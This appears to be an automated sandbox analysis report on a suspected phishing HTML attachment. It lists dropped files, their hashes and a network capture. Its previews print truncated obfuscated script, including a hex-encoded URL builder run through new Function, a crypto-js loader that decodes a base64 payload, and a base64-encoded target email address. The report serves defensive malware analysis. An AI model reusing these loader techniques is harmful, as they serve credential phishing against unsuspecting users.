                                                                                                        Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):563851
                                                                                                        Entropy (8bit):5.221453271093944
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                                        MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                        SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                        SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                        SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                        Malicious:false
                                                                                                        URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                        Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):26288
                                                                                                        Entropy (8bit):7.984195877171481
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                        MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                        SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                        SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                        SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                        Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):167730
                                                                                                        Entropy (8bit):5.045981547409661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxW:clZAP+keedJ
                                                                                                        MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                                                        SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                                                        SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                                                        SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                                                        Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4054
                                                                                                        Entropy (8bit):7.797012573497454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 76 x 63, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPlRAtnlomNhBxl/k4E08up:6v/lhPctloGB7Tp
                                                                                                        MD5:1634B1E1BB841E406E367933967A0F10
                                                                                                        SHA1:00DA5DF62534CAD04F516787121D872B425B3248
                                                                                                        SHA-256:A0E8CA3B3E9DF69541063B3AD21C49D21BD2F02F41932E8430595AF6DA4D1881
                                                                                                        SHA-512:D9271B608AEBE64F488E56A82191574E2E7863201B89CC7CB2BE348F67DE2BEB2D0FB9477B1C65CFF63820B6B31E394AD6243F0A3F072E57377C9A66E6E12675
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVs
                                                                                                        Preview:.PNG........IHDR...L...?......C......IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):513
                                                                                                        Entropy (8bit):5.350826451115093
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                        MD5:602C381194795DFC124FACDF48492EF1
                                                                                                        SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                        SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                        SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                        Malicious:false
                                                                                                        URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                                                        Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):513
                                                                                                        Entropy (8bit):5.350826451115093
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                        MD5:602C381194795DFC124FACDF48492EF1
                                                                                                        SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                        SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                        SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                        Malicious:false
                                                                                                        Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1987
                                                                                                        Entropy (8bit):5.962933531038672
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:c7bLZvuFsgGELHK8hJdwskrYE16bM9TPuIW3rr:czdisgGGJwsxpbMZuIkr
                                                                                                        MD5:A80F0D7C7DAAF4970A4A1F05366EC5F9
                                                                                                        SHA1:2EB2D2642DC192C335772FAC8F7FFF1348F8690B
                                                                                                        SHA-256:904F65613253EF1F772934A1389F81FAE900F8653EA7735BD71CE00996BCCD73
                                                                                                        SHA-512:08A0B17ACFAB5AA3CFF34765FA9A1760D8020CA681DDE2A468565E3983F4C97EB20055FFD82E9F9075281B7E263FD7D7FB555EA26552DE1A633BE29E1A9F9201
                                                                                                        Malicious:false
                                                                                                        Preview: var TKwAqetFCULTfzKc = document.createElement("script");..TKwAqetFCULTfzKc.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(TKwAqetFCULTfzKc);..TKwAqetFCULTfzKc.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiNHVYOHFaVXlhNm1NSGZVY2VwRzdhMmsyRFl3VmhONDI3Y1g3amR4SUJaMTZ4VjZxcG1TMzg3VFc3eXdXZDlWRk9xdTd2MEhvNHdJNTlJT2txUWpKYnpSZ0RDeStzb0VsWlhhWVNRU0d6dURrZ0k0ZnFuVDBpalc0UGpcLzdDZWwxSnhHQVJmN2MyaHk4ZlI4ditvanE5cFwvVVpzOGExRHRBdFJaTElyazBsdDNqdm9sZXNOY2FwYXI3VGgyUGJBcEd1am03dGNoQ0tOeGJBclNnbmtFNUNPemJSWENRXC9SQkxZTTFjVU1YUXpGaHdYWE1CNjFXRERtWjFsS1laZXQrcHh0Uk5TRVFJRmc0XC80aHVUOVdTRHg1SEVBc0E5ajdHdWhcLzBUSENvclNXdHhLb0dGaEFhcEpOWnVZb1Y2QVlNc3ZLNzNPQ0tlcHkzZ2hSbHFkTVV3S2JJTWFhWFVXemxrNU1vaDZkZzFsWjN3UU9BQURMYlhUWDF5OTRoa3lKWllFTTNaQkFpQWY5MHRJbVJNVXlvYk1Sd013N0JEWVNRM2FHQ1YycVNVVlIyZGViaTFta2ZZXC9MTDlUSlJDUk5jMGl0UXlGeVJrV1BiaFlxT3ViQ096eTE1djNJcFc3UVA5RkdaVStHUmdRRU12RGlqVEJRc3UzNWxDcDBvUkNOaTM0TktKZ1g3VDNRWk
                                                                                                        File type:HTML document, ASCII text, with very long lines (556), with CRLF line terminators
                                                                                                        Entropy (8bit):4.892373534743237
                                                                                                        TrID:
                                                                                                        • HyperText Markup Language (12001/1) 29.26%
                                                                                                        • HyperText Markup Language (12001/1) 29.26%
                                                                                                        • HyperText Markup Language (11001/1) 26.83%
                                                                                                        • HyperText Markup Language (6006/1) 14.65%
                                                                                                        File name:vRecord__0064secs__warriorsheart.com.html
                                                                                                        File size:917 bytes
                                                                                                        MD5:4376b42b8018b289a37f2cdb8fd3d3e5
                                                                                                        SHA1:ea8e79365245406688edf252b91ccbd04bd602ab
                                                                                                        SHA256:1f9213052e41530432c38abfbcbb4042739817637089fc61ff6b94f9eab418dc
                                                                                                        SHA512:3e68df8a2fa923ce875e3ff87e929d2f3762e7d7e46b96f2799d000161059563b5545de7e4ddefc39df11d04053c3840633d0983d73b744de81a86e7f0b8af20
                                                                                                        SSDEEP:12:kxVPQgim3fvDIPwA/qX4om0q1GgjUKX+vr/tiV9r1mzb5Hce8vD2JGxteCW3I:kHRiCrmPZj0arO1Ii643I
                                                                                                        TLSH:471100C00EF19D6463704896DB89DA3C5E1FF87F94618820BD092B900B72A78E1C0D9B
                                                                                                        File Content Preview:<html><head><meta charset="UTF-8"></head><body><script>butterbur = '#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==';....new Function(.. (() => {.. let dgRF = '68617774686f726e203d206068747470733a2f602b272f7061272b2274657262726f222b277468272b2765722
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 23:16:38.277189970 CET49675443192.168.2.4173.222.162.32
                                                                                                        Dec 18, 2024 23:16:39.085700035 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:39.085738897 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:39.085820913 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:39.086137056 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:39.086153984 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.348429918 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.348781109 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.348790884 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.350919962 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.351186037 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.352016926 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.352097988 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.352128983 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.395365000 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.483935118 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.483946085 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.658303022 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.791719913 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.791796923 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.791969061 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.792002916 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.793459892 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.793653965 CET49734443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.793669939 CET4434973469.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.940470934 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:40.940510035 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.940716028 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:40.940881968 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:40.940888882 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.943578005 CET49738443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.943586111 CET4434973869.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.943650007 CET49738443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.943876028 CET49738443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:40.943897963 CET4434973869.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.165962934 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.166218996 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:42.166234970 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.167881012 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.167949915 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:42.168976068 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:42.169063091 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.169141054 CET49737443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:42.169147968 CET44349737104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.201350927 CET4434973869.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.201514006 CET49738443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:42.201523066 CET4434973869.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.203082085 CET4434973869.49.245.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.203146935 CET49738443192.168.2.469.49.245.172
                                                                                                        Dec 18, 2024 23:16:42.203464031 CET49738443192.168.2.469.49.245.172
